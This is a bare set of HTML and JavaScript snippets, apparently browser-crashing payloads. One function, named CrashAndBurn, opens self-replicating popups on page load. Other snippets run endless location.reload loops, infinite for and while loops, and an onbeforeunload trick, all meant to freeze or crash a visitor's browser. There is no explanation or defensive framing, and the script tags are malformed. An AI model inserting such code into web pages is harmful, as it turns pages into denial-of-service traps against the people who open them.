
<script>
  <script type="text/javascript"> 
function CrashAndBurn(url) { popupWindow = window.open( url,'popUpWindow','height=181,width=666,left=3,top=222') }
</script> 
<body onload="JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');">
  </script>
<script>
   setTimeout(function(){
    while(1)location.reload(1)
  }, 1000)
  </script>
<script>
  for(var i = 0; i === i; i++) {}
  </script>

<script>
  onbeforeunload = function(){localStorage.x=1};
  while(1)location.reload(1)
  </script>
<script>
      while(true) {
       for(let i = 99; i === i; i *= i) {
          console.log(i);
       };
    };
  </script>
